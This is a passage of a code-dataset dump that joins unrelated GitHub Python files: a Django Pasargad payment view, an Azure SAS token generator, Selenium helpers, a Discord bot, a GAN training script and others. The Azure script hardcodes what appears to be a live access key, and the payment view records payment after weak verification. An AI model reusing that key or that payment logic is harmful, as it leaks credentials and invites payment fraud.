{'deta':deta,'darman':darman,'detass':detass,'darmanjo_fo':darmanjo_fo})\n\n\nclass Unsubmit_Payment(TemplateView):\n template_name = \"forms/Unsubmit.html\"\n\n#payment\ndef payment(request, slug,id):\n\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n date = datetime.datetime.now()\n global invoice_number\n payment_price = darmangar.objects.get(slug=slug)\n global amount\n amount = int(payment_price.price)\n print(payment_price)\n url = f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n pasargad = Pasargad(4916435, 2148370, url, 'cert.xml')\n payment_url = pasargad.redirect(\n amount=amount,\n invoice_number=random.randint(0, 9000000),\n invoice_date=str(date),\n )\n url = 'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n return HttpResponseRedirect(payment_url, url)\n\ndef check_transaction(request,slug,id):\n payment_price = darmangar.objects.get(slug=slug)\n darmanjo_fo = darmanjo_form.objects.get(id=id)\n global amount\n amount = int(payment_price.price)\n print(payment_price)\n pasargad = Pasargad(4916435, 2148370, 'http://127.0.0.1:8000/home', 'cert.xml')\n print(\"okey\")\n TransactionReferenceID = request.GET.get('tref')\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n 
print(TransactionReferenceID)\n print(InvoiceNumber)\n print(InvoiceDate)\n try:\n response = pasargad.check_transaction(\n reference_id=TransactionReferenceID,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n \n with open('data.txt', 'a') as f:\n data = json.dumps(response)\n data1 = str(data)\n f.write(data1+\"\\n\")\n print(\"okey\")\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=amount,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n informations = darmanjo_form.objects.filter(id=darmanjo_fo.id).update(payment=True)\n print(\"sabt shod\")\n #informations = darmanjo_form.objects.create()\n return HttpResponseRedirect(reverse('form:home'))\n except Exception:\n return HttpResponseRedirect(reverse('form:Unsubmit'))\n\n\n #response = json.loads(response.read().decode('utf-8'))\n\n\n#f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{darmanjo_fo.id}/'\n#f'http://127.0.0.1:8000/checkss/{payment_price.slug}/{deta.pk}/{deta.fname}/{darmanjo_fo.id}/'\n\n\n\"\"\"\n if request.method == 'GET':\n informations = darmanjo_form.objects.filter(id=darmanjo_fo.id).update(payment=True)\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=amount,\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n #informations = darmanjo_form.objects.create()\n return HttpResponse(\"okey\")\n except Exception:\n return HttpResponse(\"okey\")\n\"\"\"\n\"\"\"\n pasargad = Pasargad(4916435, 2148370, f'http://127.0.0.1:8000/home', 'cert.xml')\n response = pasargad.check_transaction(\n reference_id=request.GET['tref'],\n invoice_number=request.GET['iN'],\n invoice_date=request.GET['iD'],\n )\n with open('data.txt', 'a') as f:\n data = json.dumps(response)\n data1 = str(data)\n f.write(data1+\"\\n\")\n \n data = json.dumps(response)\n print(data)\n x = data.get(\"IsSuccess\")\n print(\"<--------------------------> \"+x)\n if x == \"True\":\n if request.method == 'GET':\n informations = darmanjo_form.objects.filter(information__fname__icontains=deta1.fname, information__lname__icontains=deta1.lname,id=darmanjo_fo.id).update(payment=True)\n InvoiceNumber = request.GET.get('iN')\n InvoiceDate = request.GET.get('iD')\n response = pasargad.verify_payment(\n amount=\"17000\",\n invoice_number=InvoiceNumber,\n invoice_date=InvoiceDate,\n )\n #informations = darmanjo_form.objects.create()\n return HttpResponse(\"okey\")\n else:\n return HttpResponse(\"False\")\n\n\"\"\"","repo_name":"javadhoseeinzade/first-project","sub_path":"Forms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33634441905","text":"#!/bin/python\nimport time\n#import urllib\nfrom urllib.parse import urlparse\nimport hmac\nimport hashlib\nimport base64\n\ndef get_auth_token(sb_name, eh_name, sas_name, sas_value):\n \"\"\"\n Returns an authorization token dictionary \n for making calls to Event Hubs REST API.\n \"\"\"\n uri = urlparse(f\"https://{sb_name}.servicebus.windows.net/{eh_name}\")\n \n sas = sas_value.encode('utf-8')\n expiry = str(int(time.time() + 10000))\n string_to_sign = f\"{uri}\\n{expiry}\".encode('utf-8')\n signed_hmac_sha256 = hmac.HMAC(sas, string_to_sign, hashlib.sha256)\n signature = urlparse(base64.b64encode(signed_hmac_sha256.digest()))\n return {\"sb_name\": sb_name,\n \"eh_name\": eh_name,\n 
\"token\":'SharedAccessSignature sr={}&sig={}&se={}&skn={}' \\\n .format(uri, signature, expiry, sas_name)\n }\n\nprint ( get_auth_token('sapps-eventdriven-servicebus', 'upper-case', 'listner', 'ZlgMkVC4TmEMpS8QFPth1TrdHC98mb1YL+ASbJuUQeU=')['token'] )\n\n","repo_name":"wkaczurba/wkaczurba.github.io","sub_path":"docs/azure/sas/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8541002866","text":"\"\"\"An example with GIF generation at the end. How cool is that!\n\nThis example requires the Moviepy library installed (pip install moviepy).\n\n\"\"\"\nfrom Bio import Entrez, SeqIO\nimport moviepy.editor as mpe\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nimport matplotlib.pyplot as plt\nfrom dna_features_viewer import BiopythonTranslator, CircularGraphicRecord\n\n# DOWNLOAD THE PLASMID's RECORD FROM NCBI\n\nhandle = Entrez.efetch(\n db=\"nucleotide\", id=1473096477, rettype=\"gb\", retmode=\"text\"\n)\nrecord = SeqIO.read(handle, \"genbank\")\n\n# CREATE THE GRAPHIC RECORD WITH DNA_FEATURES_VIEWER\n\ncolor_map = {\n \"rep_origin\": \"yellow\",\n \"CDS\": \"orange\",\n \"regulatory\": \"red\",\n \"misc_recomb\": \"darkblue\",\n \"misc_feature\": \"lightblue\",\n}\ntranslator = BiopythonTranslator(\n features_filters=(lambda f: f.type not in [\"gene\", \"source\"],),\n features_properties=lambda f: {\"color\": color_map.get(f.type, \"white\")},\n)\ntranslator.max_line_length = 15\ngraphic_record = translator.translate_record(\n record, record_class=CircularGraphicRecord\n)\ngraphic_record.labels_spacing = 15\n\n# ANIMATE INTO A GIF WITH MOVIEPY\n\nduration = 5\n\n\ndef make_frame(t):\n top_nucleotide_index = t * graphic_record.sequence_length / duration\n graphic_record.top_position = top_nucleotide_index\n ax, _ = graphic_record.plot(figure_width=8, figure_height=11)\n ax.set_ylim(top=2)\n np_image = mplfig_to_npimage(ax.figure)\n plt.close(ax.figure)\n return np_image\n\n\nclip = mpe.VideoClip(make_frame, duration=duration)\nsmall_clip = clip.crop(x1=60, x2=-60, y1=100, y2=-100).resize(0.5)\nsmall_clip.write_gif(\"example_with_gif.gif\", fps=15)\n","repo_name":"Edinburgh-Genome-Foundry/DnaFeaturesViewer","sub_path":"examples/example_with_gif.py","file_name":"example_with_gif.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":508,"dataset":"github-code","pt":"16"} +{"seq_id":"30584530761","text":"import os\n\nfrom datetime import datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support.select import Select\nimport time\nfrom common.file import CommonFile\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nclass BaseWebDriver:\n def __init__(cls):\n pass\n \n driver: WebDriver = None\n \n @classmethod\n def start_driver(cls):\n options = webdriver.ChromeOptions()\n options.add_argument('--lang=ja-JP')\n options.add_experimental_option('detach', True)\n cls.driver = webdriver.Chrome(ChromeDriverManager().install(),options=options)\n cls.driver.maximize_window()\n\n @classmethod\n def stop_driver(cls):\n cls.driver.quit()\n \n 
@classmethod\n    def log_current_url(cls):\n        print('current URL: ', cls.driver.current_url)\n\n    @classmethod\n    def get_screenshot(cls, id: str = \"temp\", \n            prefix: str = \"\", suffix: str = \"\"):\n        now = datetime.now()\n        prefix = f\"{prefix}_\" if prefix else \"\"\n        suffix = f\"_{suffix}\" if suffix else \"\"\n        file_name = f\"{id}_{prefix}{now.strftime('%Y%m%d%H%M%S%f')}{suffix}.png\"\n        dir_path = f\"{os.getcwd()}/screenshots/\"\n        file_path = f\"{dir_path}{file_name}\"\n        \n        if not CommonFile.exists_path(dir_path):\n            CommonFile.make_directory(dir_path)\n\n        print(f'screenshot:{file_path}')\n        screenshot = cls.driver.get_screenshot_as_png()\n        \n        CommonFile.make(file_path, screenshot, mode='wb+')\n\n    @classmethod\n    def switch_to_window(cls, index=-1):\n        # wait a little because selenium moves too fast\n        cls.wait(0.5)\n        \n        windows = cls.driver.window_handles\n        if index == -1:\n            index = len(windows) - 1\n        cls.driver.switch_to.window(windows[index])\n\n    @classmethod\n    def find_wait_clickable_element(cls, selector, wait_seconds=5):\n        wait = WebDriverWait(cls.driver, wait_seconds)\n        elm = wait.until(EC.element_to_be_clickable(selector))\n        return elm\n    \n    @classmethod\n    def find_wait_located_element(cls, selector, wait_seconds=10):\n        wait = WebDriverWait(cls.driver, wait_seconds)\n        elm = wait.until(EC.visibility_of_element_located(selector))\n        return elm\n\n    @classmethod\n    def wait_loading(cls, selector, wait_seconds=10):\n        # wait until the element used for the check has been loaded\n        wait = WebDriverWait(cls.driver, wait_seconds)\n        elm = wait.until(EC.visibility_of_element_located(selector))\n        \n    @classmethod\n    def wait(cls, wait_seconds=1):\n        time.sleep(wait_seconds)\n    \n    @classmethod\n    def clear_text(cls, elm: WebElement):\n        elm.clear()\n    \n    @classmethod\n    def input_text(cls, elm: WebElement, value):\n        cls.clear_text(elm)\n        elm.send_keys(value)\n    \n    @classmethod\n    def input_text_add(cls, elm: WebElement, value):\n        elm.send_keys(value)\n    \n    @classmethod\n    def input_checkbox(cls, elm: WebElement, is_check: bool):\n        is_checked = elm.is_selected()\n        if is_checked == is_check:\n            return\n        elm.click()\n\n    @classmethod\n    def input_select(cls, elm: WebElement, value):\n        Select(elm).select_by_value(value)\n    \n    @classmethod\n    def input_radio(cls, name: str , value):\n        elm_list = cls.driver.find_elements(by=By.NAME, value=name)\n        elm = next(filter(lambda x:x.get_attribute('value') == value, elm_list))\n        elm.click()\n    \n    @classmethod\n    def select_radio(cls, elm: WebElement):\n        elm.click()\n    ","repo_name":"kazuki-ikeya/seleniumSample","sub_path":"python/src/base/drivers/base_web_driver.py","file_name":"base_web_driver.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25821361110","text":"from uplogic.nodes import ULActionNode\nfrom uplogic.nodes import ULOutSocket\nfrom uplogic.ui import Canvas\n\n\nclass ULCreateUICanvas(ULActionNode):\n    def __init__(self):\n        ULActionNode.__init__(self)\n        self.condition = None\n        self._canvas = None\n        self._done = False\n        self.OUT = ULOutSocket(self, self._get_done)\n        self.CANVAS = ULOutSocket(self, self._get_canvas)\n\n    def _get_done(self):\n        return self._done\n\n    def _get_canvas(self):\n        return self._canvas\n\n    def evaluate(self):\n        self._done = False\n        if not self.get_input(self.condition):\n            return\n        self._canvas = Canvas()\n        self._done = True\n        
\n","repo_name":"UPBGE/uplogic","sub_path":"uplogic/nodes/actions/createuicanvas.py","file_name":"createuicanvas.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"70651876167","text":"import asyncio\nimport nextcord\nfrom nextcord.ext import commands\nfrom typing import Union\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom constantes import tokenReact\n\ndef main() -> None:\n intentsBot = nextcord.Intents.default()\n intentsBot.members = True\n intentsBot.messages = True\n intentsBot.message_content = True\n bot = commands.Bot(command_prefix=\",\", help_command=None, intents = intentsBot)\n\n @bot.command(name=\"react\")\n async def react(ctx, *emojis: Union[nextcord.Emoji, str]):\n reference = ctx.message.reference\n\n if reference:\n msg = await ctx.channel.fetch_message(reference.message_id)\n for emoji in emojis:\n await msg.add_reaction(emoji)\n\n await ctx.message.delete()\n\n loop = asyncio.get_event_loop()\n loop.create_task(bot.start(tokenReact))\n loop.run_forever()\n\nmain()\n","repo_name":"fabnem12/squadro-bot","sub_path":"discordUtils/reactbot.py","file_name":"reactbot.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"11890741601","text":"def from_snafu(snafu):\n return sum({ '=': -2, '-': -1, '0': 0, '1': 1, '2': 2 }[v] * (5 ** i) for i, v in enumerate(reversed(list(snafu))))\n\ndef to_snafu(number):\n # First convert the number to base 5\n digits = []\n while number:\n digits.append(number % 5)\n number //= 5\n digits.append(0)\n\n # Convert overflow 3s, 4s and 5s to next digit\n for i, digit in enumerate(digits):\n if digit > 2: digits[i] -= 5; digits[i+1] += 1\n\n if digits[-1] == 0: digits = digits[:-1]\n\n return ''.join([{ -2: '=', -1: '-', 0: '0', 1: '1', 2: '2' }[x] for x in reversed(digits)])\n\nwith open(\"./day25/input.txt\") as f:\n lines = f.read().splitlines()\n\npart1 = to_snafu(sum([from_snafu(x) for x in lines]))\nprint(part1)\n","repo_name":"craigfe/advent-of-code-2022","sub_path":"day25/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12446040898","text":"from __future__ import annotations\nfrom django.contrib.auth import get_user_model\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.core.mail import send_mail\nimport uuid\nimport time\nimport random\nfrom ..dto.create_user import CreateUserDTO\nfrom ..exceptions import (\n ConfirmationCodeExpired,\n ConfirmationCodeDoesNotExist\n)\nfrom ...models import EmailConfirmationCode\n\n\ndef add_user(data: CreateUserDTO) -> None:\n user_model = get_user_model()\n created_user = user_model.objects.create_user(username=data.username,\n email=data.email,\n password=data.password,\n is_active=False)\n\n confirmation_code = str(uuid.uuid4())\n code_expiration_time = int(time.time()) + settings.CONFIRMATION_CODE_LIFETIME\n confirmation_url = settings.SERVER_HOST + reverse('confirm') + f'?code={confirmation_code}'\n EmailConfirmationCode.objects.create(\n user=created_user,\n expiration=code_expiration_time,\n code=confirmation_code\n )\n send_mail(\n subject='Confirm your email',\n message=f\"Please confirm your email by clicking the link below:\\n\\n{confirmation_url}\",\n 
from_email=settings.EMAIL_FROM,\n recipient_list=[data.email]\n )\n\n\ndef confirmation_user(confirmation_code: str) -> None:\n try:\n data = EmailConfirmationCode.objects.get(code=confirmation_code)\n\n except EmailConfirmationCode.DoesNotExist:\n raise ConfirmationCodeDoesNotExist('Confirmation Code Does Not Exist')\n\n if time.time() > data.expiration:\n raise ConfirmationCodeExpired\n\n user = data.user\n user.is_active = True\n user.save()\n\n data.delete()\n","repo_name":"Anastasiia323/blog_app","sub_path":"sourse/blogging_app/core/busines_logic/servises/create_user.py","file_name":"create_user.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38134018540","text":"import random\nimport math\n\n#Tournament Pools\nplayernum = int(input(\"How many players are competing: \"))\npoolnum = int(input(\"How many pools: \"))\nroundnum = int(input(\"How many rounds: \"))\nfinalnum = int(input(\"How many people in finals: \"))\nsplitnum = math.ceil(playernum / poolnum)\n\ndef createrecords(playernum):\n matchhistory = {}\n for player in range(1, playernum + 1):\n matchhistory[player] = [0, 0, 0] #games, wins, points\n return matchhistory\n\ndef splitlist(poolnum, splitnum, players, pools):\n for num in range(poolnum):\n print(players[splitnum * num: splitnum * (num+1)])\n pools.append(players[splitnum * num: splitnum * (num+1)])\n\ndef poollist(pools, splitnum):\n totalmatch = 0\n for group in pools:\n poolmatch = []\n print()\n print(\"Pool \" + str(pools.index(group) + 1) + \":\")\n for num in range(0, len(group)):\n for x in range(num + 1, len(group)):\n poolmatch.append([group[x], group[num]])\n totalmatch += 1\n poolmatch = random.sample(poolmatch, len(poolmatch))\n for num in range(len(poolmatch)):\n print(\"Match \" + str(num + 1) + \": \" + str(poolmatch[num][0]) + \" vs \" + str(poolmatch[num][1]))\n if len(poolmatch) == 0:\n print(\"No matches for this pool!\")\n return totalmatch\n \ndef matchresult(matchhistory):\n #draws\n confirm = False\n while not confirm:\n print(\"Please enter match stats!\")\n draws = input(\"Was the match a draw? Type Y or N.\")\n if draws is \"Y\" or draws is \"y\":\n player1 = int(input(\"Player 1: \"))\n player2 = int(input(\"Player 2: \"))\n player1points = float(input(\"Player 1's Points: \"))\n player2points = float(input(\"Player 2's Points: \"))\n else:\n winner = int(input(\"Winner: \"))\n loser = int(input(\"Loser: \"))\n winnerpoints = float(input(\"Winner's Points: \"))\n loserpoints = float(input(\"Loser's Points: \"))\n query = input(\"Confirm? 
Type Y or N.\")\n if query is \"Y\":\n confirm = True\n else:\n confirm = False\n print(\"Match recorded!\")\n if draws is \"Y\" or draws is \"y\":\n matchhistory[player1][0] += 1\n matchhistory[player2][0] += 1\n matchhistory[player1][1] += .5\n matchhistory[player2][1] += .5\n matchhistory[player1][2] += player1points\n matchhistory[player2][2] += player2points\n else:\n matchhistory[winner][0] += 1\n matchhistory[winner][1] += 1\n matchhistory[loser][0] += 1\n matchhistory[winner][2] += winnerpoints\n matchhistory[loser][2] += loserpoints\n\ndef decidefinals(finalnum, matchhistory, playernum):\n criteria = {}\n finals = []\n for player in range(1, playernum + 1):\n criteria[player] = matchhistory[1] / matchhistory[0]\n gameratio = set(criteria.values())\n while finals < finalnum:\n for item in criteria:\n if criteria[item] == max(gameratio):\n del(criteria[item])\n finals.append(item)\n gameratio.remove(max(gameratio))\n \n\ndef generatematch(playernum, poolnum, roundnum, splitnum):\n matchhistory = createrecords(playernum)\n print(matchhistory)\n for num in range(roundnum):\n pools = []\n players = random.sample(range(1, playernum + 1), playernum)\n splitlist(poolnum, splitnum, players, pools)\n print()\n print(\"Round \" + str(num + 1) + \":\")\n print(pools)\n for num in range(poollist(pools, splitnum)):\n matchresult(matchhistory)\n decidefinals(finalnum, matchhistory, playernum)\n\ngeneratematch(playernum, poolnum, roundnum, splitnum)\n\n\n","repo_name":"danielkim0-highschool/Assorted-Python-Projects","sub_path":"TournamentPools.py","file_name":"TournamentPools.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25097006175","text":"#!/usr/bin/env python\n\"\"\"\n####################################################################################\n # -*- coding: utf-8 -*-\n # Author : Thomas Neuer (tneuer)\n # Creation Date : 2019-11-18 14:45:06\n # Description :\n####################################################################################\n\"\"\"\nimport os\nif \"lhcb_data2\" in os.getcwd():\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport sys\nsys.path.insert(1, \"Preprocessing\")\nsys.path.insert(1, \"TFModels\")\nsys.path.insert(1, \"TFModels/building_blocks\")\nsys.path.insert(1, \"TFModels/GAN\")\nsys.path.insert(1, \"TFModels/CGAN\")\nsys.path.insert(1, \"TFModels/CGAN/OLD\")\nsys.path.insert(1, \"Utilities\")\nimport json\nimport grid_search\n\nimport numpy as np\nimport tensorflow as tf\nif \"lhcb_data2\" in os.getcwd():\n gpu_frac = 0.3\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_frac)\n print(\"1 GPU limited to {}% memory.\".format(np.round(gpu_frac*100)))\nelse:\n gpu_options = None\n\nfrom TFModels.PGAN import create_algorithm\nimport Preprocessing.initialization as init\nfrom building_blocks.layers import logged_dense, conv2d_logged, conv2d_transpose_logged\nfrom building_blocks.layers import reshape_layer, sample_vector_layer, replicate_vector_layer\nfrom building_blocks.layers import logged_dense, conv2d_logged, conv2d_transpose_logged, residual_block, unet, unet_original, inception_block\nfrom functionsOnImages import padding_zeros\nfrom generativeModels import GenerativeModel\n\n\n############################################################################################################\n# Parameter 
definiton\n############################################################################################################\nparam_dict = {\n \"z_dim\": [32, 64],\n \"optimizer\": [tf.train.RMSPropOptimizer],\n \"algorithm\": [\"CGAN\"],\n \"dataset\": [\"PiplusLowerP\"],\n \"gen_steps\": [1],\n \"adv_steps\": [5],\n # \"architecture\": [\"more_unbalanced\"],\n \"architecture\": [\"unbalanced2\", \"unbalanced\"],\n \"is_patchgan\": [False],\n \"batch_size\": [8],\n \"loss\": [\"cross-entropy\", \"KL\", \"wasserstein\"],\n \"cc\": [False],\n \"lr\": [0.001],\n \"feature_matching\": [False, True],\n \"label_smoothing\": [0.95]\n}\nsampled_params = grid_search.get_parameter_grid(param_dict=param_dict, n=30, allow_repetition=True)\n\nfor params in sampled_params:\n\n activation = tf.nn.leaky_relu\n algorithm = str(params[\"algorithm\"])\n append_y = False\n architecture = str(params[\"architecture\"])\n architecture_path = \"../Architectures/CGAN/{}.json\".format(architecture)\n is_patchgan = bool(params[\"is_patchgan\"])\n loss = str(params[\"loss\"])\n is_wasserstein = loss == \"wasserstein\"\n is_cycle_consistent = bool(params[\"cc\"])\n label_smoothing = float(params[\"label_smoothing\"])\n\n batch_size = int(params[\"batch_size\"])\n dataset = str(params[\"dataset\"])\n epochs = 120\n feature_matching = bool(params[\"feature_matching\"])\n\n keep_cols = [\"x_projections\", \"y_projections\", \"real_ET\"]\n nr_test = 100\n nr_train = 50000\n\n optimizer = params[\"optimizer\"]\n learning_rate = float(params[\"lr\"])\n\n if \"lhcb_data2\" in os.getcwd():\n path_loading = \"../Data/{}/LargeSample\".format(dataset)\n path_results = \"../Results/{}\".format(dataset)\n else:\n path_loading = \"../Data/{}/Debug\".format(dataset)\n path_results = \"../Results/Test/{}\".format(dataset)\n\n reshape_z = \"none\"\n steps_adv = int(params[\"adv_steps\"])\n steps_gen = int(params[\"gen_steps\"])\n steps_log = 3\n\n padding = {\"top\":2, \"bottom\":2, \"left\":0, \"right\":0}\n x_dim = image_shape = (52+padding[\"top\"]+padding[\"bottom\"], 64+padding[\"left\"]+padding[\"right\"], 1)\n y_dim = len(keep_cols)\n z_dim = int(params[\"z_dim\"])\n\n\n ############################################################################################################\n # Network initialization\n ############################################################################################################\n\n\n if reshape_z == \"none\":\n architectures = GenerativeModel.load_from_json(architecture_path)\n architecture_gen = architectures[\"Generator\"]\n architecture_adv = architectures[\"Critic\"]\n if is_patchgan:\n architecture_adv.append([conv2d_logged, {\"filters\": 64, \"kernel_size\": 4, \"strides\": 2, \"activation\": tf.nn.leaky_relu}])\n if is_wasserstein:\n architecture_adv.append([conv2d_logged, {\"filters\": 1, \"kernel_size\": 4, \"strides\": 1, \"activation\": tf.identity}])\n else:\n architecture_adv.append([conv2d_logged, {\"filters\": 1, \"kernel_size\": 4, \"strides\": 1, \"activation\": tf.nn.sigmoid}])\n else:\n architecture_adv[-1][1][\"activation\"] = tf.nn.leaky_relu\n\n elif reshape_z == \"replicate\":\n initial_size = [7, 8]\n architecture_gen = [\n [replicate_vector_layer, {\"size\": initial_size}],\n [conv2d_transpose_logged, {\"filters\": 512, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 1, \"kernel_size\": 2, \"strides\": 
2, \"activation\": activation_last_layer}]\n ]\n elif reshape_z == \"sample\":\n initial_size = [7, 8]\n architecture_gen = [\n [sample_vector_layer, {\"size\": initial_size, \"y_dim\": len(keep_cols),\n \"rfunc\": sampling_distribution[0], \"rparams\": sampling_distribution[1]}],\n [conv2d_transpose_logged, {\"filters\": 512, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [conv2d_transpose_logged, {\"filters\": 1, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation_last_layer}]\n ]\n else:\n raise NotImplementedError(\"Wrong reshape_z method.\")\n\n if is_cycle_consistent:\n architecture_aux = [\n [tf.layers.conv2d, {\"filters\": 128, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.conv2d, {\"filters\": 256, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.conv2d, {\"filters\": 128, \"kernel_size\": 2, \"strides\": 2, \"activation\": activation}],\n [tf.layers.flatten, {}],\n [tf.layers.dense, {\"units\": z_dim+y_dim, \"activation\": tf.identity}],\n ]\n else:\n architecture_aux = None\n\n ############################################################################################################\n # Data loading\n ############################################################################################################\n if not os.path.exists(path_results):\n os.mkdir(path_results)\n\n path_saving = init.initialize_folder(algorithm=algorithm, base_folder=path_results)\n\n data, scaler = init.load_processed_data(path_loading, return_scaler=True)\n train_calo = data[\"train\"][\"Calo\"][:nr_train]\n train_tracker = data[\"train\"][\"Tracker\"][:nr_train]\n test_calo = data[\"test\"][\"Calo\"]\n test_tracker = data[\"test\"][\"Tracker\"]\n\n train_calo = padding_zeros(train_calo, **padding).reshape([-1, *image_shape])\n test_calo = padding_zeros(test_calo, **padding).reshape([-1, *image_shape])\n test_calo = test_calo[:nr_test]\n logging_calo = test_calo[:15]\n\n ##### Rescale and check that identical\n def invert_standardize_data(data, scaler, exclude=None):\n import pandas as pd\n standardized_data = data.drop(exclude, axis=1, inplace=False)\n colnames = standardized_data.columns.values\n standardized_data = pd.DataFrame(data=scaler.inverse_transform(standardized_data), columns=colnames, index=data.index)\n data = pd.concat([standardized_data, data[exclude]], axis=1, sort=False)\n return data\n\n train_tracker[\"real_ET\"] = invert_standardize_data(data=train_tracker, scaler=scaler[\"Tracker\"], exclude=[\"theta\", \"phi\", \"region\"])[\"real_ET\"]\n train_tracker[\"real_ET\"] /= scaler[\"Calo\"]\n\n test_tracker[\"real_ET\"] = invert_standardize_data(data=test_tracker, scaler=scaler[\"Tracker\"], exclude=[\"theta\", \"phi\", \"region\"])[\"real_ET\"]\n test_tracker[\"real_ET\"] /= scaler[\"Calo\"]\n\n assert np.max(train_calo) == 1, \"Train calo maximum not one. 
Given: {}.\".format(np.max(train_calo))\n # assert np.allclose(np.mean(train_tracker[keep_cols[:-1]], axis=0), 0, atol=1e-5), \"Train not centralized: {}.\".format(\n # np.mean(train_tracker[keep_cols], axis=0)\n # )\n # assert np.allclose(np.mean(test_tracker, axis=0), 0, atol=1e-1), \"Test not centralized: {}.\".format(np.mean(test_tracker, axis=0))\n # assert np.allclose(np.std(train_tracker[keep_cols[:-1]], axis=0), 1, atol=1e-10), \"Train not standardized: {}.\".format(\n # np.std(train_tracker[keep_cols], axis=0)\n # )\n assert image_shape == train_calo.shape[1:], \"Wrong image shape vs train shape: {} vs {}.\".format(image_shape, train_calo.shape[1:])\n train_tracker = train_tracker[keep_cols].values\n test_tracker = test_tracker[keep_cols].values\n test_tracker = test_tracker[:nr_test]\n logging_tracker = test_tracker[:15]\n\n nr_train = train_calo.shape[0]\n\n ############################################################################################################\n # Preparation\n ############################################################################################################\n def prepare_algorithm(network, optimizer, learning_rate):\n network.compile(logged_labels=logging_tracker, logged_images=logging_calo, optimizer=optimizer, learning_rate=learning_rate,\n loss=loss, feature_matching=feature_matching, label_smoothing=label_smoothing)\n network.set_attributes(keep_cols)\n post_message = \"\"\"\\nCalo shape: {}\\nTracker shape: {}\n \\nUsed attributes: {}\n \\nAppend attributes at every layer: {}\"\"\".format(train_calo.shape, train_tracker.shape, keep_cols, append_y)\n network.log_architecture(post_message=post_message)\n\n nr_params = network.get_number_params()\n nr_gen_params = network._nets[0].get_number_params()\n nr_disc_params = network._nets[1].get_number_params()\n sampler = network.get_sampling_distribution()\n config_data.update({\"nr_params\": nr_params, \"sampler\": sampler, \"generator_out\": network._generator._output_layer.name, \"optimizer\": optimizer.__name__, \"nr_gen_params\": nr_gen_params, \"nr_disc_params\": nr_disc_params})\n\n config_data.pop(\"architectures\")\n with open(path_saving+\"/config.json\", \"w\") as f:\n json.dump(config_data, f, indent=4)\n\n config_data = init.create_config_file(globals())\n\n ############################################################################################################\n # Model Training\n ############################################################################################################\n\n try:\n network = create_algorithm(algorithm, x_dim=x_dim, y_dim=y_dim, z_dim=z_dim,\n gen_architecture=architecture_gen, adv_architecture=architecture_adv,\n aux_architecture=architecture_aux,\n folder=path_saving, append_y_at_every_layer=append_y,\n is_patchgan=is_patchgan, is_wasserstein=is_wasserstein)\n\n prepare_algorithm(network, optimizer, learning_rate)\n\n network.show_architecture()\n network.train(x_train=train_calo, y_train=train_tracker, x_test=test_calo, y_test=test_tracker,\n epochs=epochs, batch_size=batch_size, steps=steps_gen, log_step=steps_log, gpu_options=gpu_options,\n batch_log_step=None)\n with open(path_saving+\"/EXIT_FLAG0.txt\", \"w\") as f:\n f.write(\"EXIT STATUS: 0. No errors or warnings.\")\n tf.reset_default_graph()\n except GeneratorExit as e:\n with open(path_saving+\"/EXIT_FLAG1.txt\", \"w\") as f:\n f.write(\"EXIT STATUS: 1. 
